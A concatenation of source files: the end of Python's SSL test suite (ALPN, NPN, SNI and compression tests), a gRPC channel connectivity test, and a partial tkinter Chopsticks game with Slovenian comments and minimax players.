test_compression(self): context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) if support.verbose: sys.stdout.write(" got compression: {!r}\n".format(stats['compression'])) self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' }) @unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'), "ssl.OP_NO_COMPRESSION needed for this test") def test_compression_disabled(self): context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) context.options |= ssl.OP_NO_COMPRESSION stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['compression'], None) def test_dh_params(self): # Check we can get a connection with ephemeral Diffie-Hellman context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) context.load_dh_params(DHFILE) context.set_ciphers("kEDH") stats = server_params_test(context, context, chatty=True, connectionchatty=True) cipher = stats["cipher"][0] parts = cipher.split("-") if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts: self.fail("Non-DH cipher: " + cipher[0]) def test_selected_alpn_protocol(self): # selected_alpn_protocol() is None unless ALPN is used. context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['client_alpn_protocol'], None) @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required") def test_selected_alpn_protocol_if_server_uses_alpn(self): # selected_alpn_protocol() is None unless ALPN is used by the client. 
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_verify_locations(CERTFILE) server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_alpn_protocols(['foo', 'bar']) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) self.assertIs(stats['client_alpn_protocol'], None) @unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test") def test_alpn_protocols(self): server_protocols = ['foo', 'bar', 'milkshake'] protocol_tests = [ (['foo', 'bar'], 'foo'), (['bar', 'foo'], 'foo'), (['milkshake'], 'milkshake'), (['http/3.0', 'http/4.0'], None) ] for client_protocols, expected in protocol_tests: server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_alpn_protocols(server_protocols) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_cert_chain(CERTFILE) client_context.set_alpn_protocols(client_protocols) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) msg = "failed trying %s (s) and %s (c).\n" \ "was expecting %s, but got %%s from the %%s" \ % (str(server_protocols), str(client_protocols), str(expected)) client_result = stats['client_alpn_protocol'] self.assertEqual(client_result, expected, msg % (client_result, "client")) server_result = stats['server_alpn_protocols'][-1] \ if len(stats['server_alpn_protocols']) else 'nothing' self.assertEqual(server_result, expected, msg % (server_result, "server")) def test_selected_npn_protocol(self): # selected_npn_protocol() is None unless NPN is used context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) context.load_cert_chain(CERTFILE) stats = server_params_test(context, context, chatty=True, connectionchatty=True) self.assertIs(stats['client_npn_protocol'], None) @unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test") def test_npn_protocols(self): server_protocols = ['http/1.1', 
'spdy/2'] protocol_tests = [ (['http/1.1', 'spdy/2'], 'http/1.1'), (['spdy/2', 'http/1.1'], 'http/1.1'), (['spdy/2', 'test'], 'spdy/2'), (['abc', 'def'], 'abc') ] for client_protocols, expected in protocol_tests: server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(CERTFILE) server_context.set_npn_protocols(server_protocols) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.load_cert_chain(CERTFILE) client_context.set_npn_protocols(client_protocols) stats = server_params_test(client_context, server_context, chatty=True, connectionchatty=True) msg = "failed trying %s (s) and %s (c).\n" \ "was expecting %s, but got %%s from the %%s" \ % (str(server_protocols), str(client_protocols), str(expected)) client_result = stats['client_npn_protocol'] self.assertEqual(client_result, expected, msg % (client_result, "client")) server_result = stats['server_npn_protocols'][-1] \ if len(stats['server_npn_protocols']) else 'nothing' self.assertEqual(server_result, expected, msg % (server_result, "server")) def sni_contexts(self): server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) server_context.load_cert_chain(SIGNED_CERTFILE) other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) other_context.load_cert_chain(SIGNED_CERTFILE2) client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) client_context.verify_mode = ssl.CERT_REQUIRED client_context.load_verify_locations(SIGNING_CA) return server_context, other_context, client_context def check_common_name(self, stats, name): cert = stats['peercert'] self.assertIn((('commonName', name),), cert['subject']) @needs_sni def test_sni_callback(self): calls = [] server_context, other_context, client_context = self.sni_contexts() def servername_cb(ssl_sock, server_name, initial_context): calls.append((server_name, initial_context)) if server_name is not None: ssl_sock.context = other_context server_context.set_servername_callback(servername_cb) stats = server_params_test(client_context, server_context, 
chatty=True, sni_name='supermessage') # The hostname was fetched properly, and the certificate was # changed for the connection. self.assertEqual(calls, [("supermessage", server_context)]) # CERTFILE4 was selected self.check_common_name(stats, 'fakehostname') calls = [] # The callback is called with server_name=None stats = server_params_test(client_context, server_context, chatty=True, sni_name=None) self.assertEqual(calls, [(None, server_context)]) self.check_common_name(stats, 'localhost') # Check disabling the callback calls = [] server_context.set_servername_callback(None) stats = server_params_test(client_context, server_context, chatty=True, sni_name='notfunny') # Certificate didn't change self.check_common_name(stats, 'localhost') self.assertEqual(calls, []) @needs_sni def test_sni_callback_alert(self): # Returning a TLS alert is reflected to the connecting client server_context, other_context, client_context = self.sni_contexts() def cb_returning_alert(ssl_sock, server_name, initial_context): return ssl.ALERT_DESCRIPTION_ACCESS_DENIED server_context.set_servername_callback(cb_returning_alert) with self.assertRaises(ssl.SSLError) as cm: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED') @needs_sni def test_sni_callback_raising(self): # Raising fails the connection with a TLS handshake failure alert. 
server_context, other_context, client_context = self.sni_contexts() def cb_raising(ssl_sock, server_name, initial_context): 1.0/0.0 server_context.set_servername_callback(cb_raising) with self.assertRaises(ssl.SSLError) as cm, \ support.captured_stderr() as stderr: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE') self.assertIn("ZeroDivisionError", stderr.getvalue()) @needs_sni def test_sni_callback_wrong_return_type(self): # Returning the wrong return type terminates the TLS connection # with an internal error alert. server_context, other_context, client_context = self.sni_contexts() def cb_wrong_return_type(ssl_sock, server_name, initial_context): return "foo" server_context.set_servername_callback(cb_wrong_return_type) with self.assertRaises(ssl.SSLError) as cm, \ support.captured_stderr() as stderr: stats = server_params_test(client_context, server_context, chatty=False, sni_name='supermessage') self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR') self.assertIn("TypeError", stderr.getvalue()) def test_read_write_after_close_raises_valuerror(self): context = ssl.SSLContext(ssl.PROTOCOL_SSLv23) context.verify_mode = ssl.CERT_REQUIRED context.load_verify_locations(CERTFILE) context.load_cert_chain(CERTFILE) server = ThreadedEchoServer(context=context, chatty=False) with server: s = context.wrap_socket(socket.socket()) s.connect((HOST, server.port)) s.close() self.assertRaises(ValueError, s.read, 1024) self.assertRaises(ValueError, s.write, b'hello') def test_main(verbose=False): if support.verbose: plats = { 'Linux': platform.linux_distribution, 'Mac': platform.mac_ver, 'Windows': platform.win32_ver, } for name, func in plats.items(): plat = func() if plat and plat[0]: plat = '%s %r' % (name, plat) break else: plat = repr(platform.platform()) print("test_ssl: testing with %r %r" % (ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO)) 
print(" under %s" % plat) print(" HAS_SNI = %r" % ssl.HAS_SNI) print(" OP_ALL = 0x%8x" % ssl.OP_ALL) try: print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1) except AttributeError: pass for filename in [ CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE, ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY, SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA, BADCERT, BADKEY, EMPTYCERT]: if not os.path.exists(filename): raise support.TestFailed("Can't read certificate file %r" % filename) tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests] if support.is_resource_enabled('network'): tests.append(NetworkedTests) if _have_threads: thread_info = support.threading_setup() if thread_info: tests.append(ThreadedTests) try: support.run_unittest(*tests) finally: if _have_threads: support.threading_cleanup(*thread_info) if __name__ == "__main__": test_main()
# ===== file: _channel_test.py =====
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Exercises cygrpc channel connectivity-watching under thread contention."""

import time
import threading
import unittest

from grpc._cython import cygrpc

from tests.unit.framework.common import test_constants


def _channel_and_completion_queue():
    """Build a channel to a dummy address together with a completion queue."""
    channel = cygrpc.Channel(b'localhost:54321', cygrpc.ChannelArgs(()))
    return channel, cygrpc.CompletionQueue()


def _connectivity_loop(channel, completion_queue):
    """Repeatedly query the channel's connectivity state and watch for a
    change, draining each watch event from the completion queue."""
    for _ in range(100):
        state = channel.check_connectivity_state(True)
        deadline = cygrpc.Timespec(time.time() + 0.2)
        channel.watch_connectivity_state(state, deadline, completion_queue,
                                         None)
        completion_queue.poll(deadline=cygrpc.Timespec(float('+inf')))


def _create_loop_destroy():
    """Full lifecycle: create a channel/queue pair, run the connectivity
    loop, then shut the queue down."""
    channel, queue = _channel_and_completion_queue()
    _connectivity_loop(channel, queue)
    queue.shutdown()


def _in_parallel(behavior, arguments):
    """Run ``behavior(*arguments)`` on THREAD_CONCURRENCY threads and wait
    for all of them to finish."""
    workers = [
        threading.Thread(target=behavior, args=arguments)
        for _ in range(test_constants.THREAD_CONCURRENCY)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()


class ChannelTest(unittest.TestCase):

    def test_single_channel_lonely_connectivity(self):
        # Many threads hammer the connectivity API of one shared channel.
        channel, completion_queue = _channel_and_completion_queue()
        _in_parallel(_connectivity_loop, (channel, completion_queue,))
        completion_queue.shutdown()

    def test_multiple_channels_lonely_connectivity(self):
        # Each thread owns its private channel/queue pair.
        _in_parallel(_create_loop_destroy, ())


if __name__ == '__main__':
    unittest.main(verbosity=2)
# ===== file: igra_nedelujoca.py =====
import tkinter as tk
import threading
import time

##################################################################################
## Igra
#
# igra.py implements everything needed for the game and its user interface.
#
##################################################################################

# Index constants for accessing the first and second player's data, which
# are stored in two-element lists -- hence 0 and 1.
IGRALEC_1 = 0
IGRALEC_2 = 1

# Search-depth constants for the individual game-playing algorithms.
MINIMAX_GLOBINA = 3
MINIMAXPP_GLOBINA = 5
ALPHABETA_GLOBINA = 7

def nasprotnik(igralec):
    """Return the opponent (0 or 1) of the player currently to move."""
    return (1 - igralec)

class Igra():
    """Rule keeper for the game "Prstki" (Chopsticks).

    State:
      position       -- [hands_p1, hands_p2]; each is a list of finger counts,
                        one per hand (0 == dead hand)
      na_potezi      -- index of the player to move (IGRALEC_1 / IGRALEC_2)
      history        -- stack of (position, na_potezi) snapshots, for undo
      position_count -- occurrences of each (position, player) pair, used by
                        the repetition/draw rule
    """
    def __init__(self, prsti, roke, master=None):
        # Number of hands per player and the finger count at which a hand
        # wraps around (see opravi_potezo's modulo).
        self.roke = roke
        self.prsti = prsti
        # self.position holds the current position.  Initialised with lists
        # of ones (every hand shows one finger); one inner list per player.
        self.position = [[1 for _ in range(self.roke)], [1 for _ in range(self.roke)]]
        # The first player always opens the game.
        self.na_potezi = IGRALEC_1
        # Move history, used for UNDO.
        self.history = []
        # Counting positions supports the draw (repetition) rule.
        self.position_count = {}

    def kopija(self):
        """Return a copy of the game, for the Racunalnik (AI) class.

        Only position and na_potezi are copied; history and position_count
        are left empty in the copy.
        """
        kopija_igra = Igra(self.prsti, self.roke)
        kopija_igra.position = [self.position[i][:] for i in range(2)]
        kopija_igra.na_potezi = self.na_potezi
        return kopija_igra

    def shrani_pozicijo(self):
        """Push the current position onto the undo history."""
        # As prof. Bauer aptly remarked, the lists must be copied, not
        # aliased.
        pozicija = [self.position[i][:] for i in range(2)]
        self.history.append((pozicija, self.na_potezi))
        # Also record the position in the dict used for the draw check.
        try:
            self.position_count[((tuple(pozicija[IGRALEC_1]), tuple(pozicija[IGRALEC_2])), self.na_potezi)] += 1
        except KeyError:
            self.position_count[((tuple(pozicija[IGRALEC_1]), tuple(pozicija[IGRALEC_2])), self.na_potezi)] = 1

    def razveljavi_potezo(self):
        """Undo the last move (pops history and decrements the repetition
        counter for the restored position)."""
        assert self.history != [], "Igra.razveljavi_potezo: self.history is empty."
        (self.position, self.na_potezi) = self.history.pop()
        self.position_count[((tuple(self.position[IGRALEC_1]), tuple(self.position[IGRALEC_2])), self.na_potezi)] -= 1

    def je_veljavna_poteza(self, roka_napadalca, roka_nasprotnika):
        """Check that the player is neither attacking with an empty hand
        nor attacking an empty hand."""
        return self.position[self.na_potezi][roka_napadalca] != 0 and self.position[nasprotnik(self.na_potezi)][roka_nasprotnika] != 0

    def je_veljavna_delitev(self):
        """Determine whether a split is possible; sets self.moznost_delitve
        and, when a split is allowed, self.prsti_po_delitvi (fingers per
        hand after the split)."""
        preostale_roke = 0
        self.moznost_delitve = False
        for roka in self.position[self.na_potezi]:
            if roka != 0:
                preostale_roke += 1
                stevilo_prstov = roka
            # Check whether only one hand remains so far and whether its
            # finger count is a multiple of the number of hands.
            # NOTE(review): the flag can latch True after inspecting only the
            # FIRST non-empty hand (e.g. position [2, 2] with roke=2 sets
            # moznost_delitve on the first iteration even though a second
            # live hand follows) -- confirm against the intended rules.
            if preostale_roke == 1 and stevilo_prstov % self.roke == 0:
                self.moznost_delitve = True
                self.prsti_po_delitvi = stevilo_prstov // self.roke

    def veljavne_poteze(self):
        """Find ALL valid moves, which helps the Racunalnik() class as well
        as us.  A move is a triple whose first element says whether a split
        must be performed first, the second is the index of the attacking
        hand, and the third the index of the attacked hand."""
        poteze_arr = []
        # Add the moves without a split.
        for roka_napadalca in range(self.roke):
            for roka_napadenega in range(self.roke):
                if self.je_veljavna_poteza(roka_napadalca, roka_napadenega):
                    poteze_arr.append((False, roka_napadalca, roka_napadenega))
        # If a split is possible, also add every move with a split.  We only
        # check that the attacked hand is not 0 (after a split the
        # attacker's hands cannot be 0).
        self.je_veljavna_delitev()
        if self.moznost_delitve:
            for roka_napadalca in range(self.roke):
                for roka_napadenega in range(self.roke):
                    if self.position[nasprotnik(self.na_potezi)][roka_napadenega] != 0:
                        poteze_arr.append((True, roka_napadalca, roka_napadenega))
        return poteze_arr

    def opravi_delitev(self):
        """Perform a split, if one is allowed."""
        # Find out whether the split may be performed.
        self.je_veljavna_delitev()
        if self.moznost_delitve:
            # Save the position in case we change our mind about splitting.
            self.shrani_pozicijo()
            # Perform the split: distribute the fingers evenly over all hands.
            self.position[self.na_potezi] = [self.prsti_po_delitvi for _ in range(self.roke)]

    def opravi_potezo(self, roka_napadalca, roka_napadenega):
        """Save the current position and perform the move.  The attacked
        hand's fingers wrap modulo self.prsti (reaching exactly self.prsti
        kills the hand)."""
        if self.je_veljavna_poteza(roka_napadalca, roka_napadenega):
            self.shrani_pozicijo()
            self.position[nasprotnik(self.na_potezi)][roka_napadenega] = (self.position[nasprotnik(self.na_potezi)][roka_napadenega] + self.position[self.na_potezi][roka_napadalca]) % self.prsti
            self.na_potezi = nasprotnik(self.na_potezi)

    def je_remi(self):
        """Check whether we have returned to a previously seen position,
        i.e. whether this (position, player-to-move) pair was already
        recorded exactly once in the history -- the first repetition counts
        as a draw."""
        try:
            return self.position_count[((tuple(self.position[IGRALEC_1]), tuple(self.position[IGRALEC_2])), self.na_potezi)] == 1
        except KeyError:
            return False

    def je_konec(self):
        """Check whether the game is over, i.e. the player to move has
        nothing but empty hands."""
        return self.position[self.na_potezi] == [0 for _ in range(self.roke)]

##################################################################################################
#
# The Gui class
#
# Handles everything to do with the user interface.  This is the classic GUI.
#
##################################################################################################

class Gui():
    def __init__(self, master):
        self.master = master
        # Build the menu bar.
        menu = tk.Menu(self.master)
        self.master.config(menu=menu)
        # Build the "Igra" (Game) child menu.
menu_igra = tk.Menu(menu) menu.add_cascade(label="Igra", menu=menu_igra) menu_igra.add_command(label="Nova igra", command=self.izbira_igre) menu_igra.add_command(label="Pravila igre", command=self.pravila) menu_igra.add_separator() menu_igra.add_command(label="Izhod", command=self.master.destroy) # Naredimo child menu Možnosti. menu_options = tk.Menu(menu) menu.add_cascade(label="Možnosti", menu=menu_options) menu_options.add_command(label="Spremeni grafični vmesnik", command=lambda:select_gui(self.master, self)) menu_options.add_command(label="Help", command=self.help) # Nastavimo igralca na človek, da lahko v izbira_igre lažje # kličemo prekini_igralce. self.igralec_1 = Clovek(self) self.igralec_2 = Clovek(self) self.izbira_igre() def izbira_igre(self): """Uporabniku damo možnost, da se odloči za število rok in prstov ter izbor igralcev.""" self.prekini_igralce() # Konstante za širino Entry-ja in Button-a. WDTH_BUTTON = 20 WDTH_ENTRY = 5 self.new_frame() # Spremenljivke za OptionMenu. self.option1 = tk.StringVar(self.main) self.option2 = tk.StringVar(self.main) self.option1.set("Človek") self.option2.set("Minimax") # Ustvarimo labele, entryje, gumbe... label_hello = tk.Label(self.main, text="Hello human, please select who the players shall be!") label_roke = tk.Label(self.main, text="ROKE: ") self.entry_roke = tk.Entry(self.main, width=WDTH_ENTRY) label_prsti = tk.Label(self.main, text="PRSTI: ") self.entry_prsti = tk.Entry(self.main, width=WDTH_ENTRY) self.optionmenu_igralec1 = tk.OptionMenu(self.main, self.option1, "Človek", "Minimax", "Minimax++", "Alpha-Beta") self.optionmenu_igralec2 = tk.OptionMenu(self.main, self.option2, "Človek", "Minimax", "Minimax++", "Alpha-Beta") label_igralec1 = tk.Label(self.main, text="Igralec 1") label_igralec2 = tk.Label(self.main, text="Igralec 2") button_zacni = tk.Button(self.main, text="Začni igro!", command=self.preberi_igralce) # Gridamo labele, entryje, gumbe... 
label_hello.grid(row=0, columnspan=2) label_roke.grid(row=1, column=0, sticky='e') self.entry_roke.grid(row=1, column=1, sticky='w') self.entry_roke.insert(0, "2") label_prsti.grid(row=2, column=0, sticky='e') self.entry_prsti.grid(row=2, column=1, sticky='w') self.entry_prsti.insert(0, "5") label_igralec1.grid(row=3, column=0, sticky='e') label_igralec2.grid(row=3, column=1, sticky='w') self.optionmenu_igralec1.grid(row=4, column=0, sticky='e') self.optionmenu_igralec2.grid(row=4, column=1, sticky='w') button_zacni.grid(row=5, columnspan=2) def preberi_igralce(self): """Metoda, ki prebere izbrane igralce in začne igro.""" # Dobimo izbiri. option1 = self.option1.get() option2 = self.option2.get() if option1 == "Človek": if option2 == "Človek": self.zacni_igro(Clovek(self), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Clovek(self), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Clovek(self), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Minimax++": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, 
Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) elif option1 == "Alpha-Beta": if option2 == "Človek": self.zacni_igro(Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA)), Clovek(self)) elif option2 == "Minimax": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAX_GLOBINA))) elif option2 == "Minimax++": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, Minimax(globina=MINIMAXPP_GLOBINA))) elif option2 == "Alpha-Beta": self.zacni_igro(Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA)), Racunalnik(self, AlphaBeta(globina=ALPHABETA_GLOBINA))) def zacni_igro(self, igralec1, igralec2): """ Metoda, ki začne igro, torej nastavi izbrane razrede igralcev in uvodni UI.""" # Preberemo število rok in prstov. Če število rok ni int, # ali ne ustreza določenim zahtevam, vrnemo None. try: self.roke = int(self.entry_roke.get()) if self.roke <= 0: return except: return try: self.prsti = int(self.entry_prsti.get()) if self.prsti <= 1: return except: return # Ustvarimo objekte igralcev. self.igralec_1 = igralec1 self.igralec_2 = igralec2 # Začnemo igro. self.igra = Igra(self.prsti, self.roke) # Nastavimo UI za igro. self.setup_ui() def setup_ui(self): """Metoda (na novo) vzpostavi celotno igralno desko in jo nastavi na izbrano pozicijo.""" self.new_frame() # Ustvarimo spremenljivke za RadioButton-e. self.variable_igralca1 = tk.IntVar() self.variable_igralca1.set(None) self.variable_igralca2 = tk.IntVar() self.variable_igralca2.set(None) # Ustvarimo seznam RadioButtonov in ga nastavimo na trenutno pozicijo. 
self.seznam_radiobutton = [[None for _ in range(self.roke)],[None for _ in range(self.roke)]] for i in range(self.roke): self.seznam_radiobutton[IGRALEC_1][i] = tk.Radiobutton(self.main, text=self.igra.position[IGRALEC_1][i], variable=self.variable_igralca1, value=i) self.seznam_radiobutton[IGRALEC_2][i] = tk.Radiobutton(self.main, text=self.igra.position[IGRALEC_2][i], variable=self.variable_igralca2, value=i) # Če je število prstov na roki 0, onemogočimo gumb, ki predstavlja to roko. if self.igra.position[IGRALEC_1][i] == 0: self.seznam_radiobutton[IGRALEC_1][i].config(state="disabled") if self.igra.position[IGRALEC_2][i] == 0: self.seznam_radiobutton[IGRALEC_2][i].config(state="disabled") self.seznam_radiobutton[IGRALEC_1][i].grid(row=i+1, column=0) self.seznam_radiobutton[IGRALEC_2][i].grid(row=i+1, column=2) # Če je na potezi človek, potrebuje gumb za napad. if (self.igra.na_potezi == IGRALEC_1 and isinstance(self.igralec_1, Clovek))\ or (self.igra.na_potezi == IGRALEC_2 and isinstance(self.igralec_2, Clovek)): button_move = tk.Button(self.main, text="NAPAD!", command=self.preberi_potezo) button_move.grid(row=0, column=2) try: self.label_na_potezi.destroy() except: pass # Preverimo, ali je konec igre, remi. if self.igra.je_konec(): self.label_na_potezi = tk.Label(self.main, text="KONEC IGRE!\nZmagal je igralec {}".format(nasprotnik(self.igra.na_potezi)+1)) self.label_na_potezi.grid(row=self.roke+1, columnspan=3) elif self.igra.je_remi(): self.label_na_potezi = tk.Label(self.main, text="KONEC IGRE!\nPrvič ponovljeno, na pol izgubljeno.") self.label_na_potezi.grid(row=self.roke+1, columnspan=3) else: self.label_na_potezi = tk.Label(self.main, text="Na potezi je Igralec {}".format(self.igra.na_potezi+1)) self.label_na_potezi.grid(row=self.roke+1, columnspan=3) # Preverimo veljavnost delitve. Če je na voljo, se pojavi gumb razdeli. 
self.igra.je_veljavna_delitev() if self.igra.moznost_delitve: button_delitev = tk.Button(self.main, text="Razdeli", command=self.naredi_delitev) button_delitev.grid(row=0, column=1) # Če imamo kaj zgodovine, lahko ponudimo možnost razveljavitve poteze. if self.igra.history != []: self.button_razveljavi = tk.Button(self.main, text="Undo", command=self.razveljavi) self.button_razveljavi.grid(row=0, column=0) # Prisilimo igralca, da igra. Potrebno le za računalnik # (metoda igraj pri cloveku passa). if self.igra.na_potezi == IGRALEC_1: self.igralec_1.igraj() elif self.igra.na_potezi == IGRALEC_2: self.igralec_2.igraj() def preberi_potezo(self): """Preberemo in ponastavimo vrednosti spremenljivk ter naredimo potezo.""" roka_igralca1 = self.variable_igralca1.get() roka_igralca2 = self.variable_igralca2.get() self.variable_igralca1.set(None) self.variable_igralca2.set(None) self.naredi_potezo(roka_igralca1, roka_igralca2) def naredi_potezo(self, roka_igralca1, roka_igralca2): """Metoda, ki opravi potezo. Pri tem mora preveriti veljavnost poteze, spremeniti self.igra.position.""" # Preverimo, ali je igralec izbral obe roki. if roka_igralca1 != None and roka_igralca2 != None: if self.igra.na_potezi == IGRALEC_1: # Opravimo potezo self.igra.opravi_potezo(roka_igralca1, roka_igralca2) self.setup_ui() else: # Opravimo potezo self.igra.opravi_potezo(roka_igralca2, roka_igralca1) self.setup_ui() def naredi_delitev(self): """Metoda, ki opravi delitev.""" self.igra.opravi_delitev() self.setup_ui() def razveljavi(self): """Metoda, ki razveljavi potezo.""" self.igra.razveljavi_potezo() self.setup_ui() def prekini_igralce(self): """Metoda, ki prekine igralce. 
Potrebno le za računalnik (pri človeku passa).""" if self.igralec_1: self.igralec_1.prekini() if self.igralec_2: self.igralec_2.prekini() def new_frame(self): """Metoda, ki ustvari nov Frame in pred tem pobriše starega, če obstaja.""" try: self.main.destroy() except: pass finally: self.main = tk.Frame(self.master) self.main.grid() def pravila(self): """Metoda, ki napiše pravila igre.""" self.new_frame() f = open('README.md', 'r') pravila = f.read() f.close() tk.Label(self.main, text=pravila, justify='left').grid() def help(self): """Metoda, ki napiše nekaj namigov.""" self.new_frame() help = "Ko je možna delitev, se pojavi gumb, na katerega klikni, če želi opraviti delitev.\nZa razveljavitev poteze je prav tako na voljo gumb.\n\nNasvet: Za boljšo preglednost priporočamo uporabo klasičnega uporabniškega vmesnika za število prstov, ki presega 10." tk.Label(self.main, text=help, justify='left').grid() ####################################################################################### # # Razred NewGui # # Provides more enhanced GUI then class Gui # ####################################################################################### class NewGui(): # Definiramo konstante. OVAL_SIZE = 60 DIFF_MID = 100 DIFF_KROGCI = 10 def __init__(self, master): self.master = master # Naredimo menu. menu = tk.Menu(self.master) self.master.config(menu=menu) # Naredimo child menu Igra. menu_igra = tk.Menu(menu) menu.add_cascade(label="Igra", menu=menu_igra) menu_igra.add_command(label="Nova igra", command=self.izbira_igre) menu_igra.add_command(label="Pravila igre", command=self.pravila) menu_igra.add_separator() menu_igra.add_command(label="Izhod", command=self.master.destroy) # Naredimo child menu Možnosti. 
menu_options = tk.Menu(menu) menu.add_cascade(label="Možnosti", menu=menu_options) menu_options.add_command(label="Spremeni grafični vmesnik", command=lambda:select_gui(self.master, self)) menu_options.add_command(label="Help", command=self.help) # Nastavimo igralca na človek, da lahko v izbira_igre lažje # kličemo prekini_igralce. self.igralec_1 = Clovek(self) self.igralec_2 = Clovek(self) self.izbira_igre() def izbira_igre(self): """Uporabniku damo možnost, da se odloči za število rok in prstov ter izbor igralcev.""" self.prekini_igralce() # Konstante za širino Entry-ja in Button-a. WDTH_BUTTON = 20 WDTH_ENTRY = 5 self.new_frame() # Spremenljivke za OptionMenu. self.option1 = tk.StringVar(self.main) self.option2 = tk.StringVar(self.main) self.option1.set("Človek") self.option2.set("Človek") # Ustvarimo labele, entryje, gumbe... label_hello = tk.Label(self.main, text="Hello human, please select who the players shall be!") label_roke = tk.Label(self.main, text="ROKE: ") self.entry_roke = tk.Entry(self.main, width=WDTH_ENTRY) label_prsti = tk.Label(self.main, text="PRSTI: ") self.entry_prsti = tk.Entry(self.main, width=WDTH_ENTRY) self.optionmenu_igralec1 = tk.OptionMenu(self.main, self.option1, "Človek", "Minimax", "Minimax++", "Alpha-Beta") self.optionmenu_igralec2 = tk.OptionMenu(self.main, self.option2, "Človek", "Minimax", "Minimax++", "Alpha-Beta") label_igralec1 = tk.Label(self.main, text="Igralec 1") label_igralec2 = tk.Label(self.main, text="Igralec 2") button_zacni = tk.Button(self.main, text="Začni igro!", command=self.preberi_igralce) # Gridamo labele, entryje, gumbe... 
